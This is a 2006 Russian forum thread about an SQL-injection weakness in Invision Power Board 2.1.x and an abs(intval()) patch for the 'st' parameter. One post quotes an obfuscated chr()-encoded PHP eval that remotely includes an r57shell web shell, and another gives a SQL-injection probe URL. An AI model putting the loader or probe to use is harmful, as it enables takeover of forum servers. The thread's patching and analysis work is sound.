yarweb Опубликовано 30 Апреля 2006 Жалоба Поделиться Опубликовано 30 Апреля 2006 SQL-injection в Invision Power Board 2.1.xintval() однозначно + проверка на неотрицательностьа можно так: abs(intval()) Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 30 Апреля 2006 Жалоба Поделиться Опубликовано 30 Апреля 2006 2yarweb да анекдот это, а не уязвимость.see http://www.sysman.ru/index.php?showtopic=4118никакой там важной информации нет. Конечно если не считать текущее unix-time сервера важной инфой Ссылка на комментарий Поделиться на других сайтах Прочее
AHTIKILLER Опубликовано 24 Июня 2006 Жалоба Поделиться Опубликовано 24 Июня 2006 eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116).-chr(116).-chr(112).-chr(58).-chr(47).-chr(47).-chr(114). chr(115). chr(116). chr(46). chr(118). chr(111).-chr(105).-chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108).-chr(111).-chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108).-chr(108).-chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // Ребят, подскажите, как расшифрофать строку? Достали уже. (дефисы добавлены мной ) Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 24 Июня 2006 Жалоба Поделиться Опубликовано 24 Июня 2006 echo chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116).-chr(116).-chr(112).-chr(58).-chr(47).-chr(47).-chr(114). chr(115). chr(116). chr(46). chr(118). chr(111).-chr(105).-chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108).-chr(111).-chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108).-chr(108).-chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) Ссылка на комментарий Поделиться на других сайтах Прочее
Garret Опубликовано 24 Июня 2006 Жалоба Поделиться Опубликовано 24 Июня 2006 Берешь символ который соответствует каждому коду и смотришь Ссылка на комментарий Поделиться на других сайтах Прочее
resets Опубликовано 24 Июня 2006 Жалоба Поделиться Опубликовано 24 Июня 2006 Ввёл вот это: /index.php?act=members&st=%20-1[sql%20code] Выдало ошибку. Это что дыра? Ссылка на комментарий Поделиться на других сайтах Прочее
punkz Опубликовано 24 Июня 2006 Жалоба Поделиться Опубликовано 24 Июня 2006 23 июня, 2006Программа: Invision Power Board 2.1.6, возможно более ранние версии. Опасность: Низкая Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных, передаваемых в шестнадцатеричных эквивалентах HTML элементов. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. обычный xss.. вот и ответ на вопрос по этому (echo chr(105). chr(110). chr(99). chr(108). chr(117). и т.д.) Ссылка на комментарий Поделиться на других сайтах Прочее
jim bim Опубликовано 24 Июня 2006 Жалоба Поделиться Опубликовано 24 Июня 2006 Как лечить? Ссылка на комментарий Поделиться на других сайтах Прочее
Destruction Опубликовано 25 Июня 2006 Жалоба Поделиться Опубликовано 25 Июня 2006 2yarweb да анекдот это, а не уязвимость.see http://www.sysman.ru/index.php?showtopic=4118никакой там важной информации нет. Конечно если не считать текущее unix-time сервера важной инфой А префикс таблиц? ) Тоже немаловажная информация.. Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 25 Июня 2006 Жалоба Поделиться Опубликовано 25 Июня 2006 да фигня это всё. У 60% это ibf Ссылка на комментарий Поделиться на других сайтах Прочее
Destruction Опубликовано 25 Июня 2006 Жалоба Поделиться Опубликовано 25 Июня 2006 (изменено) да фигня это всё. У 60% это ibfПредлагаешь взломать 40% IPB форумов? Знаешь, я всегда действовал по-принципу, если хоть у одого человека проблемы с моим форумом - я его на сутки выключу, но потом он будет работать как следует! Где один - там милионы.. Изменено 25 Июня 2006 пользователем Destruction Ссылка на комментарий Поделиться на других сайтах Прочее
DimonVideo Опубликовано 25 Июня 2006 Жалоба Поделиться Опубликовано 25 Июня 2006 Ввёл вот это: /index.php?act=members&st=%20-1[sql%20code] Выдало ошибку. Это что дыра?[/quote]файл sources/action_public/memberlist.phpнаходим: //----------------------------------------- // Test for input //----------------------------------------- if (isset($this->ipsclass->input['st'])) $this->first = intval($this->ipsclass->input['st']); (строка 118 примерно) меняем на //----------------------------------------- // Test for input //----------------------------------------- if (isset($this->ipsclass->input['st'])) $this->first = abs(intval($this->ipsclass->input['st'])); Версия 2.1.6 Ссылка на комментарий Поделиться на других сайтах Прочее
Destruction Опубликовано 25 Июня 2006 Жалоба Поделиться Опубликовано 25 Июня 2006 В 2.0.4 аналогично: if (isset($ibforums->input['st'])) $this->first = abs(intval($ibforums->input['st'])); Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 25 Июня 2006 Жалоба Поделиться Опубликовано 25 Июня 2006 Тупость.Таких мест всегда были десятками.эта st по-моему никогда не контролировалась на отрицательное число.Я вообще даже больше скажу. st никогда к intval не приводилась, потому что st - это LIMIT, а использование UNION + LIMIT/ORDER BY не разрешается (99% запросов в IPB с LIMIT содержат ORDER BY по тому или иному полю).Т.е. даже если intval'а не будет, всё-равно хэша не получат, а получат лишь ошибку.Но конечно были и исключения, например Search.php Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения